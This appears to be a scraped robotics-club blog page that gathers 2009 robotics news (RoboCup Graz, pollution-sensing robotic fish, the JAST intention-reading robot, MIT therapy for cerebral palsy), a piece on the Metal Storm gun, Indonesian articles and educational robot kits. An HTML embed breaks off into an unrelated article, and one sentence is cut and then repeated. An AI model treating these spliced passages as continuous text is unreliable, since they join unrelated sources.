“Currently, we are working on a more accurate facial expression generation model as well as systematic way to explore the model space efficiently,” said Wu, the computer science PhD student. Wu also noted that the “body babbling” approach he and his colleagues described in their paper may not be the most efficient way to explore the model of the face.

While the primary goal of this work was to solve the engineering problem of how to approximate the appearance of human facial muscle movements with motors, the researchers say this kind of work could also lead to insights into how humans learn and develop facial expressions.

Learning to Make Facial Expressions,” by Tingfan Wu, Nicholas J. Butko, Paul Ruvulo, Marian S. Bartlett, Javier R. Movellan from Machine Perception Laboratory, University of California San Diego. Presented on June 6 at the 2009 IEEE 8th International Conference On Development And Learning.


Robot Soccer: Cooperative Soccer Playing Robots Compete

ScienceDaily (July 6, 2009) — The cooperative soccer playing robots of the Universität Stuttgart are world champions in the middle size league of robot soccer. After one of the most interesting competitions in the history of Robocup from 29th June to 5th July, 2009, in Graz, the 1. RFC Stuttgart on the last day of the competition succeeded in winning the world championship 2009 in an exciting game against the team of Tech United from Eindhoven (The Netherlands) with the final result of 4:1.


During the competition Stuttgart's robots had to make their way against 13 other teams from eight countries, among them the current world champion Cambada (Portugal). Besides the teams from Germany, Italy, The Netherlands, Portugal, and Austria, teams from China, Japan, and Iran competed against each other.

The 1.RFC Stuttgart includes staff of two Institutes, namely the department of Image Understanding (Head: Prof. Levi) of the Institute of Parallel and Distributed Systems and the Institute of Technical Optics (Head: Prof. Osten), achieved also the 2nd place at the so-called "technical challenge" and a further 1st place at the "scientific challenge".

After the final match of the competition, the middle-size league robots of the 1. RFC Stuttgart - the new world champion - had to play against the human officials of the RoboCup federation. It turned out, that hereby the robots were the inferior team. Clearly the RoboCup community has still to bridge a vast distance to reach their final goal to let a humanoid robot team play against the human world champion by the year 2050.

The success tells its own tale but one might wonder which scientific interest is behind the RoboCup competitions. Preconditions for the successful participation at these competitions are extensive efforts in current research topics of computer science such as real-time image processing and architectures, cooperative robotics and distributed planning. Possible application scenarios of these research activities reach from autonomous vehicles, cooperative manufacturing robotics, service robotics to the point of planetary or deep-sea exploration by autonomous robotic systems. In this context autonomous means that no or only a limited human intervention is necessary.

Robotic fish: the latest weapon in the fight against water pollution

Robotic Fish
To read a transcript or hear an interview with Research Scientist, Luke Speller and Bruce Gellerman of Living on Earth on the SHOAL, robotic fish project, click here.

Robotic fish, developed by UK scientists, are to be released into the sea for the first time to detect pollution.

The carp-shaped robots will be let loose in the port of Gijon in northern Spain as part of a three-year research project funded by the European Commission and co-ordinated by BMT Group Ltd, an independent engineering and risk management consultancy.

If successful, the team hopes that the fish will used in rivers, lakes and seas across the world, including Britain, to detect pollution.

The life-like creatures, which will mimic the undulating movement of real fish, will be equipped with tiny chemical sensors to find the source of potentially hazardous pollutants in the water, such as leaks from vessels in the port or underwater pipelines.

Fish Sensor DiagramThe fish will communicate with each other using ultrasonics and information will be transmitted to the port's control centre via WiFi from the "charging hub" where the fish can charge their batteries. This will enable the authorities to map in real time the source and scale of the pollution (see attached graphic).

Unlike previous robotic fish that work with remote controls, these will have autonomous navigation capabilities, enabling them to swim independently around the port without any human interaction. This will also enable them to return automatically to their hub to be recharged when battery life (approximately eight hours) is low.

Rory Doyle, senior research scientist at BMT Group, described the project as a "world first", adding that scientists involved in designing the fish were using "cutting-edge" methods to detect and reduce water pollution.

"While using shoals of robotic fish for pollution detection in harbours might appear like something straight out of science fiction, there are very practical reasons for choosing this form," he said.

"In using robotic fish we are building on a design created by hundreds of millions of years' worth of evolution which is incredibly energy efficient. This efficiency is something we need to ensure that our pollution detection sensors can navigate in the underwater environment for hours on end."

He added: "We will produce a system that allows the fish to search underwater, meaning that we will be able to analyse not only chemicals on the surface of the water (e.g. oil) but also those that are dissolved in the water."

The five fish are being built by Professor Huosheng Hu and his robotics team at the School of Computer Science and Electronic Engineering, University of Essex. He hopes to release them into the water by the end of next year.

The fish, which cost around £20,000 to make, will measure 1.5 metres (1.6 yards) in length (roughly the size of a seal) and swim at a maximum speed of about one metre (1.1 yards) per second.

He said: "I am incredibly excited about this project. We are designing these fish very carefully to ensure that they will be able to detect changes in environmental conditions in the port and pick up on early signs of pollution spreading, for example by locating a small leak in a vessel.

"The hope is that this will prevent potentially hazardous discharges at sea, as the leak would undoubtedly get worse over time if not located."

See how the robotic fish move on video: http://www.youtube.com/watch?v=gSibkb6aKHM

Disaster Setting At The RoboCup 2009: Flight And Rescue Robots Demonstrated Their Abilities

ScienceDaily (July 3, 2009) — Modern robotics can help where it is too dangerous for humans to venture. Search and rescue robots (S&R robots) have meanwhile become so sophisticated that they have already carried out their first missions in disasters. And for this reason rescue robots will be given a special place at the RoboCup 2009 – the robotics world championships in Graz.



The flight robot in action

The rescue robotics programme provided exciting rescue demonstrations in which two complex disaster scenarios formed the setting for the robots’ performances. An accident involving a passenger car loaded with hazardous materials and a fire on the rooftop of Graz Stadthalle were the two challenges that flight and rescue robots faced on their remote controlled missions. Smoke and flames made the sets as realistic as possible, ensuring a high level of thrills.

Blazing flames on the eighth floor of a skyscraper means that the reconnaissance and search for injured would already be life threatening for fire services. A remote controlled flight robot can help by reconnoitering the situation and sending information by video signals to the rescue services on the ground. As the robotics world championships, the RoboCup recognised the possible uses of rescue robots a long time ago and promoted their development in the separate category “RoboCup Rescue”. RoboCup 2009, organised by TU Graz, dedicates one particular focus to the lifesaving robots with a rescue robot demonstration, a practical course for first responders and a workshop for the exchange of experiences between rescue services and robotics researchers.

A burning rooftop and hazardous materials

Fire and smoke were seen in front of the Graz Stadthalle on Thursday 2nd July 2009, and yet there was no cause for panic – rescue robots were in action. To demonstrate the capabilities of flight and rescue robots, two disaster scenarios were re-enacted as realistically as possible. A crashed automobile loaded with hazardous materials provided a challenge to the rescue robot. Operated by rescuers by remote control, the metal helper named “Telemax” had to retrieve the sensitive substances and bring them out of the danger zone. The flight robot had to find a victim on the rooftop of the Stadthalle und send information in the form of video signals.

Emergency services meet their future helpers

There is an introduction to possible applications of today’s rescue robotics together with a practical course specially for first responders. In the training courses on 3rd and 4th July from 8 to 10am, search and rescue services from the whole world over can practise operating flight robots, go on a reconnaissance mission in a specially designed rescue area with rescue robots or practise various manipulation tasks and recover hazardous materials or retrieve injured persons using remote controlled robots.

A workshop on the topic of rescue robotics will take place following the RoboCup on the 6th July 2009 at TU Graz. The focus will be on an exchange of experiences between first responders and robotics researchers.

Metal Storm Robot Weapon Fills the Air With Lead, Shooting Anything That Moves

Here's a fearsome weapon from Australia that's not brand new but is now being considered for deployment by the US military: a kick-ass machine gun called Metal Storm. It's an Area Denial Weapon System (ADWS) that literally fills the air with lead without the need of a human operator.

The scariest part is that when you set this monster on auto, it can automagically fire 6000 rounds per minute at anything that moves. In this video after the jump, firing so many rounds so quickly sounds like a quick bark of a buzz saw. Imagine one of these in each hand of our upcoming robot overlords:

<p><br>
<object width="520" height="425"><param name="movie" value="http://www.youtube.com/v/HyAjzowYP1o">
<param name="wmode" value="transparent">
<embed src="http://www.youtube.com/v/HyAjzowYP1o" type="application/x-shockwave-flash" wmode="transparent" width="520" height="425">
Senin, 14 April 2008 | 13:59 WIB
JAKARTA, SENIN - Para insinyur badan antariksa AS (NASA) telah menentukan jalur pendaratan ke permukaan Planet Mars. Wahana penjelajah (rover) bernama Phoenix Mars Lander diharapkan memulai debutnya sebagai petulang planet merah tersebut sejak mendarat pada 25 Mei 2008.

Lokasi pendaratan dipilih dekat kutub utara Mars, tepatnya di kawasan lembah yang luas bernama Green Valley. Namun, keputusan akhir di titik mana rover tersebut akan mendarat baru akan diputuskan setelah foto-foto area sekitarnya selesai dianalisis. Satelit Mars Reconnaisance Orbiter (MRO) yang saat ini mengorbit planet tersebut telah memotret lebih dari 30 foto lembah tersebut dalam resolusi tinggi menggunakan kamera High Resolution Imaging Science Experiment (HiRISE) dan akan terus mengambil gambar lainnya untuk mendukung analisis.

Area pendaratan yang dituju adalah kawasan berbentuk elips yang bergaris tengah 100 kilometer dan 20 kilometer. Para ilmuwan NASA telah memetakan lebih dari lima juta batuan di kawasan tersebut untuk mencegah risiko kecelakaan tabrakan saat Phoenix mendarat.

"Lokasi pendaran kami mengandung konsentrasi es tertinggi di Mars selain kutub utara. Jika Anda ingi mencari tempat tinggal seperti di permafrost Arktik, kawasan ini yang harus didatangi," ujar Peter Smith, peneliti utama misi tersebut dari Universtas Arizona, AS. Phoenix memang dikirim dengan misi utama menggali lapisan tanah yang kaya es. Wahana tersebut juga dilengkapi alat untuk mengenalisis sampel tanah dan air yang ditemukan untuk mencari bukti-bukti perubahan iklim dan kemungkinan adanya kehidupan mikroba.

Dalam rencana ini, Phoenix akan berputar 145 derajat terhadap bidang datar sebelum menukik ke permukaan Mars. Kemudian, mesin pendorongnya akan dinyalakan selama sekitar 35 detik. Manuver pertama yang akan dilakukan wahana tersebut sepanjang proses pendaratan adalah mengarahkan antena ke Bumi.

Dalam tujuh menit terakhir, Phoenix harus mengurangi kecepatannya dari sekitar 21.000 kilometer. Caranya dengan mengembangkan parasit dan menyalakan pendorong berlawanan dengan arah gerakannya sejak berada pada ketinggian 914 meter. Saat menyentuh permukaan Mars dengan tiga kakinya kecepatannya diperkirakan hanya 8 kilometer perjam.

"Mendarat di Mars sungguh sangat menantang. Faktanya, baru tahun 1970-an kami bisa sukses melakukannya di planet ini. Tetap tak ada jaminan berhasil, namun kami melakukan segala sesuat yang mengurangi risiko kegagalan," ujar Doug McCuistion, direktur Program Eksplorasi Mars Nasa di Washington. (NASA/WAH)

Roboholic in news paper


Inilah PRESTASI yang telah kami hasilkan dalam komunitas robot 20


JUARA II LOMBA AKSI ROBOT LINE TRACER PIMITS KE-12 TINGKAT SMA JATIM





Usaha kami bukan hanya bicara tapi tindakan yang kritis, dinamis, serta optimis




Roboholic news >>>>

Predictive Powers: A Robot That Reads Your Intention?

ScienceDaily (June 10, 2009) — European researchers in robotics, psychology and cognitive sciences have developed a robot that can predict the intentions of its human partner. This ability to anticipate (or question) actions could make human-robot interactions more natural.


http://www.sciencedaily.com/images/2009/06/090605075302-large.jpg
Joint toy-making activity between robot and man. (Credit: Copyright JAST)

The walking, talking, thinking robots of science fiction are far removed from the automated machines of today. Even today's most intelligent robots are little more than slaves – programmed to do our bidding.

Many research groups are trying to build robots that could be less like workers and more like companions. But to play this role, they must be able to interact with people in natural ways, and play a pro-active part in joint tasks and decision-making. We need robots that can ask questions, discuss and explore possibilities, assess their companion's ideas and anticipate what their partners might do next.

The EU-funded JAST project (http://www.euprojects-jast.net/) brings a multidisciplinary team together to do just this. The project explores ways by which a robot can anticipate/predict the actions and intentions of a human partner as they work collaboratively on a task.

Who knows best?

You cannot make human-robot interaction more natural unless you understand what 'natural' actually means. But few studies have investigated the cognitive mechanisms that are the basis of joint activity (i.e. where two people are working together to achieve a common goal).

A major element of the JAST project, therefore, was to conduct studies of human-human collaboration. These experiments and observations could feed into the development of more natural robotic behaviour.

The researchers participating in JAST are at the forefront of their discipline and have made some significant discoveries about the cognitive processes involved in joint action and decision-making. Most importantly, they scrutinised the ways in which observation plays an important part in joint activity.

Scientists have already shown that a set of 'mirror neurons' are activated when people observe an activity. These neurons resonate as if they were mimicking the activity; the brain learns about an activity by effectively copying what is going on. In the JAST project, a similar resonance was discovered during joint tasks: people observe their partners and the brain copies their action to try and make sense of it.

In other words, the brain processes the observed actions (and errors, it turns out) as if it is doing them itself. The brain mirrors what the other person is doing either for motor-simulation purposes or to select the most adequate complementary action.

Resonant robotics

The JAST robotics partners have built a system that incorporates this capacity for observation and mirroring (resonance).

“In our experiments the robot is not observing to learn a task,” explains Wolfram Erlhagen from the University of Minho and one of the project consortium's research partners. “The JAST robots already know the task, but they observe behaviour, map it against the task, and quickly learn to anticipate [partner actions] or spot errors when the partner does not follow the correct or expected procedure.”

The robot was tested in a variety of settings. In one scenario, the robot was the 'teacher' – guiding and collaborating with human partners to build a complicated model toy. In another test, the robot and the human were on equal terms. “Our tests were to see whether the human and robot could coordinate their work,” Erlhagen continues. “Would the robot know what to do next without being told?”

By observing how its human partner grasped a tool or model part, for example, the robot was able to predict how its partner intended to use it. Clues like these helped the robot to anticipate what its partner might need next. “Anticipation permits fluid interaction,” says Erlhagen. “The robot does not have to see the outcome of the action before it is able to select the next item.”

The robots were also programmed to deal with suspected errors and seek clarification when their partners’ intentions were ambiguous. For example, if one piece could be used to build three different structures, the robot had to ask which object its partner had in mind.

From JAST to Jeeves

But how is the JAST system different to other experimental robots?

“Our robot has a neural architecture that mimics the resonance processing that our human studies showed take place during joint actions,” says Erlhagen. “The link between the human psychology, experimentation and the robotics is very close. Joint action has not been addressed by other robotics projects, which may have developed ways to predict motor movements, but not decisions or intentions. JAST deals with prediction at a much higher cognitive level.”

Before robots like this one can be let loose around humans, however, they will have to learn some manners. Humans know how to behave according to the context they are in. This is subtle and would be difficult for a robot to understand.

Nevertheless, by refining this ability to anticipate, it should be possible to produce robots that are proactive in what they do.

Not waiting to be asked, perhaps one day a robot may use the JAST approach to take initiative and ask: “Would you care for a cup of tea?”

The JAST project received funding from the ICT strand of the EU’s Sixth Framework Programme for research.



Robotic Therapy Holds Promise For Cerebral Palsy

ScienceDaily (May 21, 2009) — Over the past few years, MIT engineers have successfully tested robotic devices to help stroke patients learn to control their arms and legs. Now, they're building on that work to help children with cerebral palsy.

http://www.sciencedaily.com/images/2009/05/090520161335-large.jpg

A young patient tests out an MIT-developed robotic therapy device at Blythedale Children's Hospital in Westchester County, N.Y. (Credit: Photo / Peter Lang)

"Robotic therapy can potentially help reduce impairment and facilitate neuro-development of youngsters with cerebral palsy," says Hermano Igo Krebs, principal research scientist in mechanical engineering and one of the project's leaders.

Krebs and others at MIT, including professor of mechanical engineering Neville Hogan, pioneered the use of robotic therapy in the late 1980s, and since then the field has taken off.

"We started with stroke because it's the biggest elephant in the room, and then started to build it out to other areas, including cerebral palsy as well as multiple sclerosis, Parkinson's disease and spinal cord injury," says Krebs.

The team's suite of robots for shoulder-and-elbow, wrist, hand and ankle has been in clinical trials for more than 15 years with more than 400 stroke patients. The Department of Veterans Affairs has just completed a large-scale, randomized, multi-site clinical study with these devices.

All the devices are based on the same principle: that it is possible to help rebuild brain connections using robotic devices that gently guide the limb as a patient tries to make a specific movement.

When the researchers first decided to apply their work to children with cerebral palsy, Krebs was optimistic that it would succeed, because children's developing brains are more plastic than adults', meaning they are more able to establish new connections.

The MIT team is focusing on improving cerebral palsy patients' ability to reach for and grasp objects. Patients handshake with the robot via a handle, which is connected to a computer monitor that displays tasks similar to those of simple video games.

In a typical task, the youngster attempts to move the robot handle toward a moving or stationary target shown on the computer monitor. If the child starts moving in the wrong direction or does not move, the robotic arm gently nudges the child's arm in the right direction.

Krebs began working in robotic therapy as a graduate student at MIT almost 20 years ago. In his early studies, he and his colleagues found that it's important for stroke patients to make a conscious effort during physical therapy. When signals from the brain are paired with assisted movement from the robot, it helps the brain form new connections that help it relearn to move the limb on its own.

Even though a stroke kills many neurons, "the remaining neurons can very quickly establish new synapses or reinforce dormant synapses," says Krebs.

For this type of therapy to be effective, many repetitions are required — at least 400 in an hour-long session.

Results from three published pilot studies involving 36 children suggest that cerebral palsy patients can also benefit from robotic therapy. The studies indicate that robot-mediated therapy helped the children reduce impairment and improve the smoothness and speed of their reaching motions.

The researchers applied their work to stroke patients first because it is such a widespread problem — about 800,000 people suffer strokes in the United States every year. About 10,000 babies develop cerebral palsy in the United States each year, but there is more potential for long-term benefit for children with cerebral palsy.

"In the long run, people that have a stroke, if they are 70 or 80 years old, might stay with us for an average of 5 or 6 years after the stroke," says Krebs. "In the case of cerebral palsy, there is a whole life."

Most of the clinical work testing the device with cerebral palsy patients has been done at Blythedale Children's Hospital in Westchester County, N.Y., and Spaulding Rehabilitation Hospital in Boston. Other hospitals around the country and abroad are also testing various MIT-developed robotic therapy devices.

Krebs' team has focused first on robotic devices to help cerebral palsy patients with upper body therapy, but they have also initiated a project to design a pediatric robot for the ankle.

Among Krebs' and Hogan's collaborators on the cerebral palsy work are Dr. Mindy Aisen '76, former head of the Department of Veterans Affairs Office of Research and Development and presently the director and CEO of the Cerebral Palsy International Research Foundation (CPIRF); Dr. Joelle Mast, chief medical officer, and Barbara Ladenheim, director of research, of Blythedale Children's Hospital; and Fletcher McDowell, former CEO of the Burke Rehabilitation Hospital and a member of the CPIRF board of directors.

MIT's work on robotic therapy devices is funded by CPIRF and the Niarchos Foundation, the Department of Veterans Affairs, the New York State NYSCORE, and the National Center for Medical Rehabilitation Research of the Eunice Kennedy Shriver National Institute of Child Health and Human Development.



Yogyakarta

06 Juni 2009

Robot Penari Jaipong Dikonteskan

YOGYAKARTA - Kontes robot kembali digelar. Kali ini akan berlangsung di UGM, 13-14 Juni 2009. Direktorat Penelitian dan Pengabdian kepada Masyarakat dan Direktorat Jenderal Pendidikan Tinggi menunjuk kampus tersebut sebagai tuan rumah penyelenggaraan kontes robot tingkat nasional.


Tiga jenis lomba pun dipertandingkan, yakni Kontes Robot Indonesia (KRI), Kontes Robot Cerdas Indonesia (KRCI), dan Kontes Robot Seni Indonesia (KRSI).


’’Lomba sedikit berbeda dari tahun-tahun sebelumnya. Kontes menambahkan satu jenis perlombaan, yakni Kontes Robot Seni Indonesia. Robot yang dilombakan harus bisa menari mengikuti irama yang telah ditentukan, yakni tarian jaipong,’’ papar Ilona, staf pengajar Fakultas MIPA UGM yang juga panitia penyelenggara, kemarin.


Perkaya Iptek


Menurut dia, kontes robot telah mentradisi karena hampir setiap tahun dilaksanakan. Pertama kali diadakan tahun 1993, kemudian berkembang menjadi Kontes Robot Cerdas Indonesia 2003. Kali ini, UGM mendapat dukungan Direktorat Penelitian dan Pengabdian kepada Masyarakat dan Direktorat Jenderal Pendidikan Tinggi.


Dia menjelaskan kontes robot dimaksudkan untuk memenuhi salah satu tujuan pendidikan tinggi, yaitu menumbuhkembangkan dan memperkaya khazanah ilmu pengetahuan dan teknologi guna meningkatkan taraf hidup masyarakat.


Setelah melalui perlombaan di wilayah regional I, regional II, regional III, dan regional IV, diperoleh hasil untuk KRI dan KRCI tahun 2009. Berdasarkan keputusan juri, tim yang berhak tampil dalam perlombaan tingkat nasional ada 24 tim KRI, 21 tim KRCI kategori wheeled, 9 tim KRCI kategori leeged, 9 tim KRCI kategori expert single, dan 16 tim KRCI kategori expert battle. (D19, P12-27)

Sedikit cerita tentang robot >>>

Robot

Robot humanoid
memainkan trompet

Robot adalah sebuah alat mekanik yang dapat melakukan tugas fisik, baik menggunakan pengawasan dan kontrol manusia, ataupun menggunakan program yang telah didefinisikan terlebih dulu (kecerdasan buatan). Robot biasanya digunakan untuk tugas yang berat, berbahaya, pekerjaan yang berulang dan kotor. Biasanya kebanyakan robot industri digunakan dalam bidang produksi. Penggunaan robot lainnya termasuk untuk pembersihan limbah beracun, penjelajahan bawah air dan luar angkasa, pertambangan, pekerjaan "cari dan tolong" (search and rescue), dan untuk pencarian tambang. Belakangan ini robot mulai memasuki pasaran konsumen di bidang hiburan, dan alat pembantu rumah tangga, seperti penyedot debu, dan pemotong rumput.

Perkembangan sekarang

Ketika para pencipta robot pertama kali mencoba meniru manusia dan hewan, mereka menemukan bahwa hal tersebut sangatlah sulit; membutuhkan tenaga penghitungan yang jauh lebih banyak dari yang tersedia pada masa itu. Jadi, penekanan perkembangan diubah ke bidang riset lainnya. Robot sederhana beroda digunakan untuk melakukan eksperimen dalam tingkah laku, navigasi, dan perencanaan jalur. Teknik navigasi tersebut telah berkembang menjadi sistem kontrol robot otonom yang tersedia secara komersial; contoh paling mutakhir dari sistem kontrol navigasi otonom yang tersedia sekarang ini termasuk sistem navigasi berdasarkan-laser dan VSLAM (Visual Simultaneous Localization and Mapping) dari ActivMedia Robotics dan Evolution Robotics.

Ketika para teknisi siap untuk mencoba robot berjalan kembali, mereka mulai dengan heksapoda dan platform berkaki banyak lainnya. Robot-robot tersebut meniru serangga dan arthropoda dalam bentuk dan fungsi. Tren menuju jenis badan tersebut menawarkan fleksibilitas yang besar dan terbukti dapat beradaptasi dengan berbagai macam lingkungan, tetapi biaya dari penambahan kerumitan mekanikal telah mencegah pengadopsian oleh para konsumer. Dengan lebih dari empat kaki, robot-robot ini stabil secara statis yang membuat mereka bekerja lebih mudah. Tujuan dari riset robot berkaki dua adalah mencapai gerakan berjalan menggunakan gerakan pasif-dinamik yang meniru gerakan manusia. Namun hal ini masih dalam beberapa tahun mendatang.


Masalah teknis lain yang menghalangi penerapan robot secara meluas adalah kompleksitas penanganan obyek fisik dalam lingkungan alam yang tetap kacau. Sensor taktil dan algoritma penglihatan yang lebih baik mungkin dapat menyelesai Masalah teknis lain yang menghalangi penerapan robot secara meluas adalah kompleksitas penanganan obyek fisik dalam lingkungan alam yang tetap kacau. Sensor taktil dan algoritma penglihatan yang lebih baik mungkin dapat menyelesaikan masalah ini. Robot Online UJI dari University Jaume I di Spanyol adalah contoh yang bagus dari perkembangan yang berlaku dalam bidang ini.

Belakangan ini, perkembangan hebat telah dibuat dalam robot medis, dengan dua perusahaan khusus, Computer Motion dan Intuitive Surgical, yang menerima pengesahan pengaturan di Amerika Utara, Eropa dan Asia atas robot-robotnya untuk digunakan dalam prosedur pembedahan minimal. Otomasi laboratorium juga merupakan area yang berkembang. Di sini, robot benchtopdigunakan untuk memindahkan sampel biologis atau kimiawi antar perangkat seperti inkubator, berupa pemegang dan pembaca cairan. Tempat lain dimana robot disukai untuk menggantikan pekerjaan manusia adalah dalam eksplorasi laut dalam dan eksplorasi antariksa. Untuk tugas-tugas ini, bentuk tubuh artropoda umumnya disukai. Mark W. Tilden dahulunya spesialis Laboratorium Nasional Los Alamos membuat robot murah dengan kaki bengkok tetapi tidak menyambung, sementara orang lain mencoba membuat kaki kepiting yang dapat bergerak dan tersambung penuh.

Robot bersayap eksperimental dan contoh lain mengeksploitasi biomimikri juga dalam tahap pengembangan dini. Yang disebut "nanomotor" dan "kawat cerdas" diperkirakan dapat menyederhanakan daya gerak secara drastis, sementara stabilisasi dalam penerbangan nampaknya cenderung diperbaiki melalui giroskop yang sangat kecil. Dukungan penting pekerjaan ini adalah untuk riset militer teknologi pemata-mataan.


Roboholic Article's

Robot Edukasi untuk Pembelajar Robotik

Robot Edukasi merupakan robot edukasi yang menggunakan robot controller berbasis mikrokontroler Microchip PIC atau Atmel AVR yang dikembangkan oleh NEXT SYSTEM Robotics Learning Center.

Robot Edukasi dilengkapi dengan sejumlah komponen pendukung seperti motor DC (lengkap dengan gear box dan roda), dukungan terhadap motor servo, line sensor, sound sensor, light sensor, touch sensor, dan modul infrared modulated receiver. Selain itu, tersedia sejumlah sensor tambahan yang bersifat opsional, seperti sensor temperatur, sensor ultrasonik, sensor api, dan yang lainnya.

Robot Edukasi dapat digunakan untuk pembelajaran otomasi, mengingat sejumlah pernak-pernik pendukung pembelajaran tersebut sudah ditanam di dalamnya.

Set sudah dilengkapi hardware programmer USB atau Parallel. Dengan demikian, pengguna laptop terkini, yang umumnya hanya dilengkapi dengan port USB, dapat melakukan pemrograman dengan mudah dan nyaman.

Banyak aplikasi robotik yang bisa dikembangkan dengan set ini, seperti: robot line follower, robot light follower, robot obstacle avoidance, remote controlled robot, robot pemadam api, robot sumo, dan yang lainnya. Aplikasi-aplikasi ini dibahas tuntas dalam kelas pelatihan Pemrograman Mikrokontroler dan Aplikasinya dalam Robotik, sekaligus ditunjukkan bahwa mengembangkan aplikasi robotik tidaklah serumit dan sesulit yang dibayangkan.

Robot Edukasi dapat diprogram dengan Bahasa C, BASIC, Pascal, serta Flowchart.

Dalam waktu dekat, NEXT SYSTEM Robotics Learning Center akan meluncurkan buku pembelajaran robotik yang membahas Robot Edukasi secara komprehensif - Bermain Mikrokontroler dan Robotika.


Brought to you by : Admin

Robot Line Tracer

Requested by : Vanillaku

| October 11, 2008

robotedukasi2Robot Line Tracer adalah satu diantara sekian banyak robot untuk pendidikan yang dikembangkan oleh NEXT SYSTEM Robotics Learning Center, yang dapat digunakan untuk pembelajaran dan partisipasi dalam kompetisi line tracing atau line following.

Robot menggunakan dua buah mikrokontroler, satu untuk pengendali pusat (mikrokontroler AVR atau PIC), dan yang kedua untuk pengendali motor (mikrokontroler MCS51). Selama robot bergerak, pengendali pusat akan membaca informasi sensor, kemudian mengirimkan perintah pergerakan yang sesuai kepada pengendali motor. Setelah perintah dikirimkan, pengendali pusat bisa mengerjakan tugas lainnya.

Modul sensor cahaya yang terpasang menggunakan LDR, namun dapat digantikan dengan modul sensor lain yang terdiri dari pasangan IR LED dan Phototransistor, atau modul sensor cahaya lainnya. Penggantian modul sensor ini sangat mudah karena mainboard menyediakan sejumlah port terbuka.

Robot menggunakan gearbox yang dapat memberikan torsi yang cukup untuk memutar roda robot hingga lebih dari 100 rpm dengan kondisi beban penuh (termasuk beban batere).

Robot Line Following memberikan kesempatan yang luas dan terbuka untuk penerapan berbagai teknik dan metoda, agar robot dapat bergerak dengan mulus dan cepat pada lintasan yang disediakan.

Robot Line Following dapat diprogram dengan Bahasa Assembly, Bahasa C, Bahasa BASIC dan Bahasa Pascal.

Modul yang digunakan merupakan modul terbuka, yang dapat dikembangkan dengan leluasa untuk berbagai aplikasi.

Untuk informasi lebih lanjut mengenai Robot line tracer silahkan kunjungi Sman 20 Surabaya


Brought to you by : Admin